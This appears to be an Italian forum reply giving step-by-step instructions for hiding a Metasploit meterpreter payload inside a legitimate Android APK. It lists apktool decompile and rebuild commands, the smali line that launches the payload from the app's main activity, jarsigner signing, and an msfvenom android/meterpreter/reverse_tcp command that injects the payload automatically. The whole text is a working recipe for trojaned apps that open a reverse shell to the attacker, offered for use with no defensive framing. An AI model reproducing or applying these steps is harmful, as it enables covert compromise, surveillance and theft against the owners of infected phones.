no allora non hai capito... allora se vuoi ti spiego sia come si fa con msf e con apktool..
apktool
apktool d -f -o "original" "file.apk" senza virgolette
apktool d -f -o "payload" "meterpreter.apk" senza virgolette
1) come prima cosa copia la cartella che sta dentro alla cartella payload che hai fatto ~/payload/smali/com/
c'è una cartella che di chiama metasploit e la copi in ~/original/smali/com
2) apri entrambi i file .xml che vedi nelle due cartelle e copi tutte i permessi
3) sempre nel file .xml di original dovrai cercare questo valore
<action android:name="android.intent.action.MAIN"/>
<category android:name="android.intent.category.LAUNCHER"/>
e nella riga prima mentre lo leggerai troverai una frase cosi android:name="percorso_file"
tu lo apri con leafpad in questo modo
leafpad /original/smali/"percorso_file".smali
e cerchi questa riga
;->onCreate(Landroid/os/Bundle
V
e proprio sotto incolli questo
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context
V
4) salvi tutto chiudi e ora ricompattiamo il file in apk in questo modo
apktool b original
ora se entri in original ti troverai due nuove cartelle che si chiamano dist e build e dentro al dist ci sarà il file in apk
5) come ultima cosa dovrai firmare l'apk in questo modo
jarsigner -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA "percorso della cartella dist" androiddebugkey
finito
in msfvenom
con il comando
msfvenom -p android/meterpreter/reverse_tcp LHOST=(ip_privato) LPORT=(porta) -x "percorso di dove si trova il file originale" -o "percorso di output del file con malware"
e con quel comando fa tutto tutto il lavoro da solo senza muovere un dito